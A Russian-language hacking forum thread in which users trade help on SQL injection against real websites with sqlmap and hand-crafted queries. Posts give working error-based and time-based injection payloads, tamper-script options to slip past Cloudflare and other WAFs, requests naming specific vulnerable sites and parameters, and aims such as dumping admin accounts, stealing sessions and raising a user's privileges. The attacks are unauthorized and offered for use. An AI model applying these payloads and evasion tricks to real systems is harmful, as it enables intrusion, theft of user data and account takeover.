так и? оперторы замены/регулярки не всегда корректно отработают если есть символы переноса или нулл байт, проверьте /*%00*/ /*%0A*/ в запросе, это ведь не долго
ну то есть что то типа того
select /*%00*/table_name from information_schema.tables limit 1;


нет, не получается.

ol1ver said:
↑ (https://antichat.live/posts/3968093/)
нет, не получается.


чёрт....

стой стой, ты же говоришь исходники читал? так структуру базы знаешь получается? зачем information_schema тогда? максимум префикс только узнать к таблицам

t0ma5 said:
↑ (https://antichat.live/posts/3968097/)
чёрт....
стой стой, ты же говоришь исходники читал? так структуру базы знаешь получается? зачем information_schema тогда? максимум префикс только узнать к таблицам


название таблицы включает в себя нижнее подчеркивание, а подчеркивание заменяется на запятую

если бы можно составить запрос где название таблицы будет закодировано (hex, base64), но в таких узких запросах не силен

ol1ver said:
↑ (https://antichat.live/posts/3968107/)
название таблицы включает в себя нижнее подчеркивание, а подчеркивание заменяется на запятую
если бы можно составить запрос где название таблицы будет закодировано (hex, base64), но в таких узких запросах не силен


char/hex base64 есть кодировки

BabaDook said:
↑ (https://antichat.live/posts/3968112/)
char/hex base64 есть кодировки


использую это http://www.waraxe.us/sql-char-encoder.html

делаю запрос вида

cat=93) AND EXTRACTVALUE(1660,CONCAT(0x5c,0x71707a7671,(SELECT MID((DATABASE()),1,50)),(SELECT 123))) AND (1749=1749

Выводится...

Notice: Error: XPATH syntax error: '\qpzvqНАЗВАНИЕ_БД123'

вместо (SELECT 123) пробую

(SELECT username FROM CONCAT(CHAR(116),CHAR(98),CHAR(108),CHAR(95),CHAR( 117),CHAR(115),CHAR(101),CHAR(114),CHAR(115)))

не проходит запрос - ошибка

Если char не прокатило,так попробуй hex base64,как тебе выше написали.

ghost8 said:
↑ (https://antichat.live/posts/3968205/)
Если char не прокатило,так попробуй hex base64,как тебе выше написали.


где вы видели чтобы можно было имя таблицы в hex char передавать?

t0ma5 said:
↑ (https://antichat.live/posts/3968216/)
где вы видели чтобы можно было имя таблицы в hex char передавать?


Не заставляйте меня крутить sql руками , это же надо такое говорить

vikler said:
↑ (https://antichat.live/posts/3968302/)
Нужна помощь
В общем, есть сайт - стандартная boolean уязвимость
Payload: XXXXX=1800&tab_06=2619) AND 3004=3004 AND (3067=3067&Y=Z&FF=UU
Но походу фильтруется запятая.
При --tamper commalessmid --no-cast название current-db, banner, current-user могу вывести. Но вот уже любые запросы, что подразумевают запятую, я не могу исполнить. К примеру получить таблицы, колонки какой-то таблицы и прочее. То естЬ, показывается число таблиц, а далее пустой вывод
Бьюсь и не знаю, как решить проблему. оооооооооочень важный сайт. Может кто сталкивался с подобным,а?


commalessmid походу не для всех запросов подходит, только для тех где mid юзается

vikler said:
↑ (https://antichat.live/posts/3968621/)
Ну а какие-нибудь другие советы будут?
Конечно я могу --sql-shell и там
Select username from users limit 1
select password from users limit 1
потом select username from users where username not like 'blabla' limit 1
и тд.
Но это рехнуться, да ещё и там ну просто очень медленный отклик


не хочу показаться грубым, но куда все спешат? куда черт подери все не успевают??!

доставать базу через boolen? да, тут можно рехнуться, потому что это извращение, не надо этим заниматься

вам нужна толька база? хотите получить выгоду? тогда мне нечем помочь

получайте наслаждение от того что делаете, в этом суть

был случай, читал файлы с сервера через time-based самописным скриптом, ещё и слипы ставил чтобы не спалится, крупный был ресурс, очень хотелось

и знаете что, это было здорово, это было чертовски здорово

вам нужен один два максимум пять записей из базы, прощупать тот ли вектор, в правильном ли направление идёт процесс

vikler said:
↑ (https://antichat.live/posts/3968644/)
Да,согласна
Тут верный ответ, совершенно негрубый. И у меня был случай time based слива, и boolean тоже можно реализовать, но скорее по-умному - пару важных записей, а далее уже в обход SQLi
Просто ветка же по sqlmap. Соответственно и вопрос тоже был по нему - возможно ещё какие-то tamper скрипты, о которых я не подумала. А так, да, сайт нужный, буду думать по-умному, уже всё выглядит не так безнадёжно, кое-что придумала.
Но спасибо за время, потраченное на написание ответа ))


у sqlmap'а есть ещё тампер для limit - commalesslimit

можно посмотреть запрос который валится из за запятых?

подробный вывод если что опция -v 3

Такая печаль ребята,

Нашел тайм байсед блинд скуль на одном саенте, там стоит ваф клоудфлейр. заюзал темпер скрипты, все слиается-подбирается, все хорошо. НО при попытке слить из таблицы юзеров -- админ акки, или вообще пересчитать колонки этой таблицы -- получаю 503 еррор. Прокси юзал.

Кто сталкивался? Как решить?


Code:
./sqlmap.py -r site.hed -D db -T user --count -v 3 --tamper="between,randomcase,space2comment" --random-agent --no-cast --time-sec=10



Code:
[DEBUG] got HTTP error code: 503 (Service Unavailable)

adawdadw said:
↑ (https://antichat.live/posts/3970156/)
Такая печаль ребята,
Нашел тайм байсед блинд скуль на одном саенте, там стоит ваф клоудфлейр. заюзал темпер скрипты, все слиается-подбирается, все хорошо. НО при попытке слить из таблицы юзеров -- админ акки, или вообще пересчитать колонки этой таблицы -- получаю 503 еррор. Прокси юзал.
Кто сталкивался? Как решить?

Code:
./sqlmap.py -r site.hed -D db -T user --count -v 3 --tamper="between,randomcase,space2comment" --random-agent --no-cast --time-sec=10


Code:
[DEBUG] got HTTP error code: 503 (Service Unavailable)



таблица юзеров вся не читается или только админские акки?

можно копипаст запрос-ответа от -v 3 ?

-------------

на таблицу юзеров могут права другие быть, для нее отдельный мускуль пользователь например создан

файлы не читаются?

t0ma5 said:
↑ (https://antichat.live/posts/3970169/)
таблица юзеров вся не читается или только админские акки?
можно копипаст запрос-ответа от -v 3 ?
-------------
на таблицу юзеров могут права другие быть, для нее отдельный мускуль пользователь например создан
файлы не читаются?


Не, файлы не читаются. Конкретной из этой таблицы имена колонок могу получить, поля -- нет, из других могу.

вангую что доступа таки нет, скрипт валится с ошибок access denied, отсюда 503

------------------

чекни есть ли таблица с сессиями, иногда пасс и не нужен, можно тиснуть сессию

как запустить поиск колонки в ручную?то есть пишу salt ssalt и т.д

если я правильно тебя понял то sqlmap -u site -D твоя бд --search salt и т.д

Подскажите, что можно выжать из ситуации:

запрос: www.site.com/search?searchword=lala (http://www.site.com/search?searchword=lala)"+AND+9815%3D8835

Ответ: No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%" OR (rv.field_value like "%lala"%" AND f.searchable = 1)) AND a.type_id IN (2)' at line 11 SQL=SELECT a.client, a.client_id, a.id, a.type_id, a.user_id, a.title, rc.catid, "*" AS text, a.ctime AS created, "2" AS browsernav, IF( s.name != "", CONCAT("Type: ", t.name, " | " , " Section: ", s.name, " | " , " Category: ", GROUP_CONCAT( DISTINCT c.name SEPARATOR ", ") ), CONCAT("Type: ", t.name, " | " , " Section: ", GROUP_CONCAT( DISTINCT c.name SEPARATOR ", ") ) ) AS section FROM jos_js_res_record AS a LEFT JOIN jos_js_res_types AS t ON t.id = a.type_id LEFT JOIN jos_js_res_record_category AS rc ON rc.record_id = a.id LEFT JOIN jos_js_res_category AS c ON c.id = rc.catid LEFT JOIN jos_js_res_category AS s ON s.id = c.section_id LEFT JOIN jos_js_res_record_values AS rv ON rv.record_id = a.id LEFT JOIN jos_js_res_fields AS f ON f.id = rv.field_id WHERE ((a.title like "%lala"%" OR (rv.field_value like "%lala"%" AND f.searchable = 1)) AND a.type_id IN (2) AND f.published AND a.published = 1 AND c.published = 1) AND ((a.title like "%9815=8835%" OR (rv.field_value like "%9815=8835%" AND f.searchable = 1)) AND a.type_id IN (2) AND f.published AND a.published = 1 AND c.published = 1) GROUP BY a.id LIMIT 0, 50

Сразу задам второй вопрос: в параметре search ограничение 20 символов. Проверка происходит на стороне сервера. Есть пусти обхода?

SQLmap не видит, что параметр уязвим.

ghost8 said:
↑ (https://antichat.live/posts/3970597/)
если я правильно тебя понял то sqlmap -u site -D твоя бд --search salt и т.д


Это поиск таблиц,мне надо колонки

Только проверял все он ищет,выводит таблицу,а потом выводит колонку.

ghost8 said:
↑ (https://antichat.live/posts/3971439/)
POST / HTTP/1.1
Content-Length: 1439
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_TFWLMOFXSC
Referer:
http://www.admir.kz/
Cookie: bestbuyplanet=201607042017315d3489f5e81da776b9e9e1 fad1808e87; astratop=1; s=1; ruid=Nq0eBkuZBldOBQAAAexeag==; top100rb=NjczKzY3Ng==; _ym_uid=1460050539758942208; yabs-vdrf=A0; _ym_isad=2; VISID=TTEFYBEBKWRPXCLTMU; _ym_visorc_13406191=w
Host:
www.admir.kz (http://www.admir.kz)
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="BannerPlace"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="category"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="contenttype"
ResourceOffer
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="filterMode"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="location"
kazakhstan
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="next"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="orderby"
1'"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="page"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="PageName"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="pagesMethod"
post
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="PageTitle"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="ResourceCategoryGroup"
ad
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="ResourceCategoryID"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="SID"
classifieds
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="treeType"
-------AcunetixBoundary_TFWLMOFXSC--
Response
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Thu, 07 Apr 2016 22:56:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Cache-Control: no-cache, private, no-store, must-revalidate, proxy-revalidate, max-stale=0, post-check=0, pre-check=0, max-age=0, s-maxage=0
Pragma: no-cache
Original-Content-Encoding: gzip
Content-Length: 48275


POST (multipart) input orderby was set to 1'"

Error message found:

You have an error in your SQL syntax

Пробую вот так:

sqlmap.py -r "C:\site.txt" --random-ag

В site.txt :

POST / HTTP/1.1

Content-Length: 1439

Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_TFWLMOFXSC

Referer: http://www.admir.kz/

Cookie: bestbuyplanet=201607042017315d3489f5e81da776b9e9e1 fad1808e87; astratop=1; s=1; ruid=Nq0eBkuZBldOBQAAAexeag==; top100rb=NjczKzY3Ng==; _ym_uid=1460050539758942208; yabs-vdrf=A0; _ym_isad=2; VISID=TTEFYBEBKWRPXCLTMU; _ym_visorc_13406191=w

Host: www.admir.kz (http://www.admir.kz)

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="BannerPlace"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="category"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="contenttype"

ResourceOffer

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="filterMode"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="location"

kazakhstan

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="next"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="orderby*"

1'"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="page"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="PageName"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="pagesMethod"

post

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="PageTitle"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="ResourceCategoryGroup"

ad

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="ResourceCategoryID"

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="SID"

classifieds

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="treeType"

-------AcunetixBoundary_TFWLMOFXSC--

Не находит sql что делаю не так?

.Light. said:
↑ (https://antichat.live/posts/3972385/)
Не находит sql что делаю не так?


Вот так правильно:

-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="orderby"

1*

Shubka75 said:
↑ (https://antichat.live/posts/3972419/)
Вот так правильно:
-------AcunetixBoundary_TFWLMOFXSC

Content-Disposition: form-data; name="orderby"

1*


Так тоже пробывал, не получается

Никто не сталкивался:

Сливаю дамп базы мапом. ПОсле слития относительно большой таблицы сохраняет ее, переходит к следующей и пишет, что не может соединиться с хостом или с прокси. После завершает процесс sqlmap.py. Перезапускаю - продолжает нормально. Надоело его пасти. Дамп работает на линуксовом дедике фоново - устал подключаться и перезапускать.

semik said:
↑ (https://antichat.live/posts/3973534/)
Никто не сталкивался:
Сливаю дамп базы мапом. ПОсле слития относительно большой таблицы сохраняет ее, переходит к следующей и пишет, что не может соединиться с хостом или с прокси. После завершает процесс sqlmap.py. Перезапускаю - продолжает нормально. Надоело его пасти. Дамп работает на линуксовом дедике фоново - устал подключаться и перезапускать.


дебаг надо смотреть

-v 3

Подскажите как обойти,находит скулю крутит и выбивает

[WARNING] turning off pre-connect mechanism because of connection ti

e out(s)

[00:46:31] [CRITICAL] can't establish SSL connection

[00:46:31] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 25 times

И я туда же))

Как в sqkmap обойти некий: eicar antivirus test (+различные etag в заголовках)

P.S>И еще Можно ли указать свой вектор?

URL encoded GET input was set to \

То есть нужно поставить символ "\" - как это указать в мапе?

Пытаюсь напрямую подключиться к MSSQL серверу:


Code:
sqlmap -d "mssql://username:pass@ipaddr:1433/tempdb"

Получаю ошибку


HTML:
[16:44:18] [CRITICAL] SQLAlchemy connection issue ('expected string or buffer')

Руками захожу на ура, тестил метасплоитовские модули, там тоже все работает. Чего тут не так?

Filipp said:
↑ (https://antichat.live/posts/3976223/)
Пытаюсь напрямую подключиться к MSSQL серверу:

Code:
sqlmap -d "mssql://username:pass@ipaddr:1433/tempdb"

Получаю ошибку

HTML:
[16:44:18] [CRITICAL] SQLAlchemy connection issue ('expected string or buffer')

Руками захожу на ура, тестил метасплоитовские модули, там тоже все работает. Чего тут не так?


Кинь таргет в лс. А не шаблон. Задай coonection string явно.

Как быстро мапом сдампить бд? кроме --threads?

Народ как sqlmapy указать куда сохранять логи сайтов? а то он всё сюда складирует C:\Documents and Settings\User\.sqlmap\output\ раньше было где стоял туда и сохранял

3acuson said:
↑ (https://antichat.live/posts/3978364/)
Народ как sqlmapy указать куда сохранять логи сайтов? а то он всё сюда складирует C:\Documents and Settings\User\.sqlmap\output\ раньше было где стоял туда и сохранял


--output-dir=OUT.

Sqlmapchik (andoid port) после слития примерно 1000 строк вылетает без ошибок не сохраняя ни единой строки. Вылетает из за полного заполнения озу.

Озу 768 Мб. Свап 512.

Что можно сделать?

Как сделать sql запрос в sql-shell?

Делаю такой запрос: UPDATE `db_user` SET `user_group_id` = '1' WHERE `db_user`.`user_id` = 2;

В таблице db_user пользователю с user_id = 2 установить user_group_id = 1

В ответ получаю:

"[WARNING] execution of custom SQL queries is only available when stacked queries are supported"

Подскажите что не так?

kacergei said:
↑ (https://antichat.live/posts/3980336/)
Как сделать sql запрос в sql-shell?
Делаю такой запрос: UPDATE `db_user` SET `user_group_id` = '1' WHERE `db_user`.`user_id` = 2;
В таблице db_user пользователю с user_id = 2 установить user_group_id = 1
В ответ получаю:
"[WARNING] execution of custom SQL queries is only available when stacked queries are supported"
Подскажите что не так?


уязвимость не поддерживает вложенные запросы(stacked queries) а значит писать в базу не получится, только читать,через SELECT

уважаемые, все хотел спросить, а можно разделитель сменить ну к примеру на : при сливе бд или что бы он был по дефолту

[09:53:38] [INFO] testing MySQL

[09:53:38] [INFO] confirming MySQL

[09:53:38] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.29, Apache 2.2.24

back-end DBMS: MySQL >= 5.0.0

[09:53:38] [INFO] fetching database names

[09:54:08] [WARNING] turning off pre-connect mechanism because of connection tim

e out(s)

[09:54:08] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[09:54:08] [WARNING] if the problem persists please try to lower the number of u

sed threads (option '--threads')

[09:54:08] [CRITICAL] connection dropped or unknown HTTP status code received

и так раз 50,что можно сделать?

[11:35:19] [INFO] fetching database names

[11:35:19] [PAYLOAD] '||(sElECt/**/'nMok'/**/fRoM/**/duAl/**/WHeRE/**/6034=6034/

**/aNd/**/(sElECt/**/2*(If((sElECt/**/*/**/fRoM/**/(sElECt/**/CoNCaT(0x7178717a7

1,(sElECt/**/cOUNt(schema_name)/**/fRoM/**/INFORMATION_SCHEMA.SCHEMATA),0x717878

7671,0x78))s),/**/8446744073709551610,/**/8446744073709551610))))||'

[11:35:49] [WARNING] turning off pre-connect mechanism because of connection tim

e out(s)

[11:35:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[11:35:49] [WARNING] if the problem persists please try to lower the number of u

sed threads (option '--threads')

[11:35:49] [DEBUG] connection dropped or unknown HTTP status code received. sqlm

ap is going to retry the request

[11:35:49] [DEBUG] connection dropped or unknown HTTP status code received. sqlm

ap is going to retry the request

[11:35:49] [CRITICAL] connection dropped or unknown HTTP status code received

[11:35:49] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 1 times

[11:35:49] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some

kind of protection is involved (e.g. WAF)

-v 3 --dbs --random-agent --safe-url=2 --safe-freq=3 --skip-urlencode --tamper="informationschemacomment.py" --hex

[20:30:02] [INFO] retrieved:

[20:30:02] [DEBUG] performed 5 queries in 11.82 seconds

[20:30:02] [ERROR] unable to retrieve the number of databases

[20:30:02] [INFO] falling back to current database

[20:30:02] [INFO] fetching current database

[20:30:02] [PAYLOAD] ' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786b78

71,(MID((HEX(IFNULL(CAST(DATABASE() AS CHAR),0x20))),1,451)),0x716b6b7671,0x78))

s), 8446744073709551610, 8446744073709551610))) AND 'xzbL' LIKE 'xzbL

[20:30:04] [DEBUG] performed 1 queries in 1.23 seconds

[20:30:04] [CRITICAL] unable to retrieve the database names

Помогите плз

добрый день всем, случилось так что похерил сессию скульмапа в которой нашел точки входа данных, сессию не могу восстановить, как указать данные из предыдущей сессии ?

сами данные:

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: lang (GET)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: lang=rus WHERE 1413=1413 AND (SELECT 4533 FROM(SELECT COUNT(*),CONCAT(0x71627a6a71,(SELECT (ELT(4533=4533,1))),0x71716b7171,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- LOyR

Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

bustudo said:
↑ (https://antichat.live/posts/3984045/)
добрый день всем, случилось так что похерил сессию скульмапа в которой нашел точки входа данных, сессию не могу восстановить, как указать данные из предыдущей сессии ?
сами данные:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: lang (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: lang=rus WHERE 1413=1413 AND (SELECT 4533 FROM(SELECT COUNT(*),CONCAT(0x71627a6a71,(SELECT (ELT(4533=4533,1))),0x71716b7171,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- LOyR
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)


они физичиски хранятся, если вы сменили ОС, пк, или была удалена та самая папка, то востановление, или никак.

BabaDook said:
↑ (https://antichat.live/posts/3984149/)
они физичиски хранятся, если вы сменили ОС, пк, или была удалена та самая папка, то востановление, или никак.


неужели с помощью опций нельзя указать тип SQL инъекции и конкретный пэйлоад?

bustudo said:
↑ (https://antichat.live/posts/3984342/)
неужели с помощью опций нельзя указать тип SQL инъекции и конкретный пэйлоад?


Самому выбрать подходящий пэйлоад нельзя, но в вашем логе был еррор-басед вектор, поэтому вы можете указать тип инъекции, дописав --technique=E

bustudo said:
↑ (https://antichat.live/posts/3984342/)
неужели с помощью опций нельзя указать тип SQL инъекции и конкретный пэйлоад?


Тип можно. Нагрузку тоже вроде можно

Была как то раз такая задача. Указывал место инъекции через * (навроде ?id=334'+OR+'24'='24'+*+--+) а для выбора пейлоада пришлось править XML, где эти пейлоады прописаны.

BabaDook said:
↑ (https://antichat.live/posts/3984372/)
Тип можно. Нагрузку тоже вроде можно




korneev said:
↑ (https://antichat.live/posts/3984391/)
Была как то раз такая задача. Указывал место инъекции через * (навроде ?id=334'+OR+'24'='24'+*+--+) а для выбора пейлоада пришлось править XML, где эти пейлоады прописаны.




Shubka75 said:
↑ (https://antichat.live/posts/3984348/)
Самому выбрать подходящий пэйлоад нельзя, но в вашем логе был еррор-басед вектор, поэтому вы можете указать тип инъекции, дописав --technique=E


Спасибо, я получил логины и пароли пользователей СУБД, как их использоватьвместе с SQLmap -ом,что дальше делать то))

[10:21:10] [INFO] fetching tables for database: pinc

[10:21:10] [INFO] the SQL query used returns 291 entries

[10:21:10] [INFO] starting 10 threads

[10:21:11] [INFO] heuristics detected web page charset 'ascii'

Database: pincY3mc7_aqwert

[1 table]

+-----------+

| UpText |

+-----------+

[10:21:37] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 291 times, 500 (Internal Server Error) - 1 times

Не получается получить все таблицы

[15:22:19] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap-mas

ter\txt\user-agents.txt': 'Opera/7.23 (Windows 98; U) [en]'

[15:22:19] [INFO] testing connection to the target URL

[15:22:19] [WARNING] there is a DBMS error found in the HTTP response body which

could interfere with the results of the tests

[15:22:19] [CRITICAL] previous heuristics detected that the target is protected

by some kind of WAF/IPS/IDS

[15:22:19] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection

[15:22:22] [CRITICAL] WAF/IDS/IPS identified as 'Generic (Unknown)'. Please cons

ider usage of tamper scripts (option '--tamper')

are you sure that you want to continue with further target testing? [y/N]

Подскажите пож-та как обойти Waf Generic ?

andrei369 said:
↑ (https://antichat.live/posts/3989650/)
[15:22:19] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap-mas
ter\txt\user-agents.txt': 'Opera/7.23 (Windows 98; U) [en]'
[15:22:19] [INFO] testing connection to the target URL
[15:22:19] [WARNING] there is a DBMS error found in the HTTP response body which
could interfere with the results of the tests
[15:22:19] [CRITICAL] previous heuristics detected that the target is protected
by some kind of WAF/IPS/IDS
[15:22:19] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[15:22:22] [CRITICAL] WAF/IDS/IPS identified as 'Generic (Unknown)'. Please cons
ider usage of tamper scripts (option '--tamper')
are you sure that you want to continue with further target testing? [y/N]
Подскажите пож-та как обойти Waf Generic ?


разберись что такое waf generic, что он фильтрует

t0ma5 said:
↑ (https://antichat.live/posts/3989651/)
разберись что такое waf generic, что он фильтрует


Я не знаю, поэтому и спрашиваю!

Какой --tamper использовать ?

andrei369 said:
↑ (https://antichat.live/posts/3989653/)
Я не знаю, поэтому и спрашиваю!
Какой --tamper использовать ?


я тоже не знаю какой тампер использовать, хз что это за waf, может для него тампера вообще нет

надо разбираться как работает этот waf и тогда уже можно думать какие тамперы использовать

пью растворимый кофе, гущи нет, хз что это за generic

http://image.prntscr.com/image/b919928a222e4cbd843b6cae4b41d1c5.png

как бороться?

BabaDook said:
↑ (https://antichat.live/posts/3990195/)
Радикально


более "доступного" ответа и не ожидал.

BabaDook said:
↑ (https://antichat.live/posts/3990214/)
Плюсик ставь


мне не жалко,будь у тебя нормальный ответ,а не очередное набивание постов

web application technology: Nginx

back-end DBMS: MySQL >= 5.5

banner: '5.5.44-0+deb7u1'

[20:47:43] [INFO] fetching database names

[20:47:43] [WARNING] the SQL query provided does not return any output

[20:47:43] [INFO] fetching number of databases

[20:47:43] [WARNING] (case) time-based comparison requires larger statistical mo

del, please wait.............................. (done)

[20:47:44] [WARNING] it is very important to not stress the network adapter duri

ng usage of time-based payloads to prevent potential disruptions

[20:47:44] [ERROR] unable to retrieve the number of databases

[20:47:44] [INFO] falling back to current database

[20:47:44] [INFO] fetching current database

[20:47:44] [INFO] resumed: martin

available databases [1]:

martin

[20:47:44] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 1 times

Не могу получить таблицы

.Light. said:
↑ (https://antichat.live/posts/3991177/)
web application technology: Nginx
back-end DBMS: MySQL >= 5.5
banner: '5.5.44-0+deb7u1'
[20:47:43] [INFO] fetching database names
[20:47:43] [WARNING] the SQL query provided does not return any output
[20:47:43] [INFO] fetching number of databases
[20:47:43] [WARNING] (case) time-based comparison requires larger statistical mo
del, please wait.............................. (done)
[20:47:44] [WARNING] it is very important to not stress the network adapter duri
ng usage of time-based payloads to prevent potential disruptions
[20:47:44] [ERROR] unable to retrieve the number of databases
[20:47:44] [INFO] falling back to current database
[20:47:44] [INFO] fetching current database
[20:47:44] [INFO] resumed: martin
available databases [1]:
martin
[20:47:44] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
Не могу получить таблицы


таргет в лс кинь.

.Light. said:
↑ (https://antichat.live/posts/3991177/)
web application technology: Nginx
back-end DBMS: MySQL >= 5.5
banner: '5.5.44-0+deb7u1'
[20:47:43] [INFO] fetching database names
[20:47:43] [WARNING] the SQL query provided does not return any output
[20:47:43] [INFO] fetching number of databases
[20:47:43] [WARNING] (case) time-based comparison requires larger statistical mo
del, please wait.............................. (done)
[20:47:44] [WARNING] it is very important to not stress the network adapter duri
ng usage of time-based payloads to prevent potential disruptions
[20:47:44] [ERROR] unable to retrieve the number of databases
[20:47:44] [INFO] falling back to current database
[20:47:44] [INFO] fetching current database
[20:47:44] [INFO] resumed: martin
available databases [1]:
martin
[20:47:44] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
Не могу получить таблицы


"available databases" говорит что доступа к information_schema нет, не удивительно что списка баз/таблиц нету)

брутфорс имхо, скульмап вроде это даже умеет

----------------------

хотя не исключаю что может быть какой то waf

-v 3 в помощь

t0ma5 said:
↑ (https://antichat.live/posts/3991356/)
"available databases" говорит что доступа к information_schema нет, не удивительно что списка баз/таблиц нету)
брутфорс имхо, скульмап вроде это даже умеет
----------------------
хотя не исключаю что может быть какой то waf
-v 3 в помощь


а темпера нет по инфсхему?

ручками надо, ручками.

Как решить

[CRITICAL] can't establish SSL connection

что в гугле нашел. чет не решается))

как решить?)

[CRITICAL] unable to connect to the target URL ('Connection reset by peer'). sqlmap is going to retry the request(s)

[11:03:22] [INFO] fetching tables for database: 'information_schema'

[11:03:22] [INFO] fetching number of tables for database 'information_schema'

[11:03:22] [INFO] retrieved:

[11:03:22] [WARNING] unable to retrieve the number of tables for database 'information_schema'

[11:03:22] [ERROR] unable to retrieve the table names for any database

do you want to use common table existence check? [y/N/q] y

[11:03:24] [INFO] checking table existence using items from 'C:\sql\txt\common-tables.txt'

[11:03:24] [INFO] adding words used on web page to the check list

[11:03:24] [INFO] starting 10 threads

[11:06:07] [WARNING] no table(s) found

No tables found

[11:06:07] [WARNING] HTTP error codes detected during run:

403 (Forbidden) - 2948 times

Питаюсь достать инфу и в итоге ничего. спасибо жду вашей help

http://www.warrelics.eu:80/classifieds/contact.php
(POST)
uid=11142&cap=165857 and (select*from(select(sleep(20)))a)-- &productid=11141&youremail=
winter@example.com (mailto:winter@example.com)
&contact=11142&final=yes&rpass=
555-555-0199@example.com (mailto:555-555-0199@example.com)

помогите расскрутить




" if author else f"

http://www.warrelics.eu:80/classifieds/contact.php
(POST)
uid=11142&cap=165857 and (select*from(select(sleep(20)))a)-- &productid=11141&youremail=
winter@example.com (mailto:winter@example.com)
&contact=11142&final=yes&rpass=
555-555-0199@example.com (mailto:555-555-0199@example.com)

помогите расскрутить

Приветствую, нужна ваша помощь!

Команды:

1. Sqlmap.py -r "txt" --dbs

Пытаясь найти базу выдает вот это:


Code:
[16:30:03] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. As heuristic test turn
ed out positive you are strongly advised to continue on with the tests. Please,
consider usage of tampering scripts as your target might filter the queries. Als
o, you can try to rerun by providing a valid value for option '--string' as perh
aps the string you have chosen does not match exclusively True responses. If you
suspect that there is some kind of protection mechanism involved (e.g. WAF) may
be you could retry with an option '--tamper' (e.g. '--tamper=space2comment')


2. Sqlmap.py -r "txt" -v 3 --tamper="space2comment" --random-agent --no-cast --time-sec=10

после нее вот это:


Code:
